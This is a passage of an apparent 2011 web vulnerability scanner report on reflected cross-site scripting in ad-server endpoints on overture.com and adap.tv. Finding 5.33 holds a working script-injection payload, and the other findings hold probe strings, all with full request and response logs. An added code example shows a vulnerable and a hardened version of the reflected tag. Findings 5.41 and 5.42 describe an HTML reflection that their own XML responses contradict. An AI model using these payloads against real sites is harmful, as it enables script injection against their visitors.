GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDI2MzNyMASzlMmww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:59 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4622


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb" type="text/css">
...[SNIP]...
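
The attribute-context reflection in finding 5.33, as an added example that is not part of the original report and not Overture's code. linkTagVulnerable() rebuilds the <link> element the way the response does; htmlAttr(), normaliseStylesheetUrl() and linkTagHardened() are an assumed fix (the ALLOWED_CSS_HOSTS allowlist is an assumption for this example, taken from the host in the reflected value; the scanned deployment's policy is not known); countTagOpeners() is a small structural check so the difference can be asserted. The payload is the one from the finding.

```javascript
// Added example for finding 5.33 (not Overture's code). The css_url value is
// concatenated into href="..." of a <link> element.

// Mirrors the vulnerable output.
function linkTagVulnerable(cssUrl) {
  return '<link rel="stylesheet" href="' + cssUrl + '" type="text/css">';
}

// Attribute-context encoder: every character that can end a quoted attribute
// value or start markup becomes a numeric character reference.
function htmlAttr(s) {
  return String(s).replace(/[&"'<>]/g, function (c) {
    return '&#' + c.charCodeAt(0) + ';';
  });
}

// Assumed allowlist for this example only.
var ALLOWED_CSS_HOSTS = ['static.mcclatchyinteractive.com'];

// Assumed fix, step 1: require an absolute http(s) URL on an allowed host and
// re-serialise it through the WHATWG URL parser, which percent-encodes " < >
// in the path. Returns null for anything that should not be emitted.
function normaliseStylesheetUrl(cssUrl) {
  var u;
  try { u = new URL(String(cssUrl)); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (ALLOWED_CSS_HOSTS.indexOf(u.hostname) === -1) return null;
  return u.href;
}

// Assumed fix, step 2: attribute-encode whatever is emitted, regardless of
// step 1, because validation and encoding guard against different things.
function linkTagHardened(cssUrl) {
  var safe = normaliseStylesheetUrl(cssUrl);
  if (safe === null) return '';   // drop the element rather than guess
  return '<link rel="stylesheet" href="' + htmlAttr(safe) + '" type="text/css">';
}

// Counts markup starts ("<" followed by a letter or "/") in a fragment.
function countTagOpeners(html) {
  var m = html.match(/<[A-Za-z\/]/g);
  return m ? m.length : 0;
}

// Payload from finding 5.33: same host as the legitimate stylesheet, so a
// host allowlist on its own would pass it.
var PAYLOAD_URL = 'http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb';

// Usage: node this_file.js
console.log(countTagOpeners(linkTagVulnerable(PAYLOAD_URL)));  // 3
console.log(countTagOpeners(linkTagHardened(PAYLOAD_URL)));    // 1
```

The payload passes the host allowlist, which is the point of keeping both steps: the allowlist stops javascript: and off-host URLs, while the URL re-serialisation and attribute encoding stop the break-out from a URL the allowlist accepts.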

5.34. http://control.adap.tv/control [as parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the as request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element (<Query><![CDATA[ ... ]]>). The payload 6d469<a>6b210401782 was submitted in the as parameter and was echoed unmodified in the application's response.

This confirms that < and > are reflected without encoding, but inside a CDATA section they are character data rather than markup, so the <a> shown here is not parsed as an element; an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section and places whatever follows in markup context, and should account for the response being served as text/xml, which browsers render as an XML document rather than as HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A23";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:23 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32692

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.35. http://control.adap.tv/control [categories parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the categories request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload 597f8<a>730fc69c430 was submitted in the categories parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A28";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:28 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33178

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=2
...[SNIP]...

5.36. http://control.adap.tv/control [context parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the context request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload f7644<a>8e21016e644 was submitted in the context parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A16";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:16 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33245

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneri
...[SNIP]...

5.37. http://control.adap.tv/control [eov parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the eov request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload 9ebae<a>8b7b7f1e2c8 was submitted in the eov parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A53";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:53 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32405

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8]]>
...[SNIP]...

5.38. http://control.adap.tv/control [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the height request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload 885f8<a>99d83319bdd was submitted in the height parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A11";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:11 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33243

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv77
...[SNIP]...

5.39. http://control.adap.tv/control [htmlEnabled parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the htmlEnabled request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload ac2c6<a>db6131604d1 was submitted in the htmlEnabled parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A40";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:40 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32448

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775]]>
...[SNIP]...

5.40. http://control.adap.tv/control [isTop parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the isTop request parameter is copied into the response body, a text/xml document, inside the CDATA section of the <Query> element. The payload cd78a<a>0be71434d95 was submitted in the isTop parameter and was echoed unmodified in the application's response.

Inside a CDATA section < and > are character data rather than markup, so the <a> shown here is not parsed as an element, and an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Manual follow-up should check whether the sequence ]]> is reflected unencoded, since that terminates the CDATA section, and should account for the response being served as text/xml rather than HTML.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A00";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:00 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32466

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=tru
...[SNIP]...

5.41. http://control.adap.tv/control [keywords parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload fa8ef<a>1955b0f7885 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32428

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd66c<a>6facc3e4125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
